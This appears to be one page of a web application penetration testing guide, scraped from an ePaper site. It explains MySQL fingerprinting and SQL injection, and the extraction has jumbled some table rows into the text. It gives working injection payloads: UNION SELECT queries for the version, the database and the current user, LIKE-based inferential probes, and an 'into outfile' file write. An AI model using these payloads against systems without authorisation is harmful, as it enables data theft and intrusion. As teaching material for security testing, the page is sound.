4.0
1NSchAb
1NSchAb
- No tags were found...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
120<br />
Web Application Penetration Testing<br />
Result Expected:<br />
If MySQL is present, the clause inside the comment block will be<br />
interpreted.<br />
Version<br />
There are three ways to gain this information:<br />
[1] By using the global variable @@version<br />
[2] By using the function [VERSION()]<br />
[3] By using comment fingerprinting with a version number<br />
/*!40110 and 1=0*/<br />
which means<br />
if(version >= 4.1.10)<br />
add ‘and 1=0’ to the query.<br />
These are equivalent as the result is the same.<br />
In band injection:<br />
1 AND 1=0 UNION SELECT @@version /*<br />
Inferential injection:<br />
Database name in use<br />
There is the native function DATABASE()<br />
In band injection:<br />
1 AND 1=0 UNION SELECT DATABASE()<br />
Inferential injection:<br />
1 AND DATABASE() like ‘db%’<br />
Result Expected:<br />
A string like this:<br />
dbname<br />
INFORMATION_SCHEMA<br />
From MySQL 5.0 a view named [INFORMATION_SCHEMA] was<br />
created. It allows us to get all informations about databases, tables,<br />
and columns, as well as procedures and functions.<br />
Here is a summary of some interesting Views.<br />
1 AND @@version like ‘<strong>4.0</strong>%’<br />
Result Expected:<br />
A string like this:<br />
5.0.22-log<br />
Login User<br />
There are two kinds of users MySQL Server relies upon.<br />
Tables_in_INFORMATION_SCHEMA<br />
..[skipped]..<br />
SCHEMATA<br />
SCHEMA_PRIVILEGES<br />
TABLES<br />
TABLE_PRIVILEGES<br />
COLUMNS<br />
DESCRIPTION<br />
..[skipped]..<br />
All databases the user has (at least) SELECT_priv<br />
The privileges the user has for each DB<br />
All tables the user has (at least) SELECT_priv<br />
The privileges the user has for each table<br />
All columns the user has (at least) SELECT_priv<br />
[1] [USER()]: the user connected to the MySQL Server.<br />
[2] [CURRENT_USER()]: the internal user who is executing the<br />
query.<br />
There is some difference between 1 and 2. The main one is that<br />
an anonymous user could connect (if allowed) with any name, but<br />
the MySQL internal user is an empty name (‘’). Another difference<br />
is that a stored procedure or a stored function are executed as<br />
the creator user, if not declared elsewhere. This can be known by<br />
using CURRENT_USER.<br />
In band injection:<br />
1 AND 1=0 UNION SELECT USER()<br />
Inferential injection:<br />
1 AND USER() like ‘root%’<br />
Result Expected:<br />
A string like this:<br />
user@hostname<br />
COLUMN_PRIVILEGES<br />
VIEWS<br />
ROUTINES<br />
TRIGGERS<br />
USER_PRIVILEGES<br />
The privileges the user has for each column<br />
All columns the user has (at least) SELECT_priv<br />
Procedures and functions (needs EXECUTE_priv)<br />
Triggers (needs INSERT_priv)<br />
Privileges connected User has<br />
All of this information could be extracted by using known techniques<br />
as described in SQL Injection section.<br />
Attack vectors<br />
Write in a File<br />
If the connected user has FILE privileges and single quotes are not<br />
escaped, the ‘into outfile’ clause can be used to export query results<br />
in a file.<br />
Select * from table into outfile ‘/tmp/file’<br />
Note: there is no way to bypass single quotes surrounding a filename.<br />
So if there’s some sanitization on single quotes like escape<br />
(\’) there will be no way to use the ‘into outfile’ clause.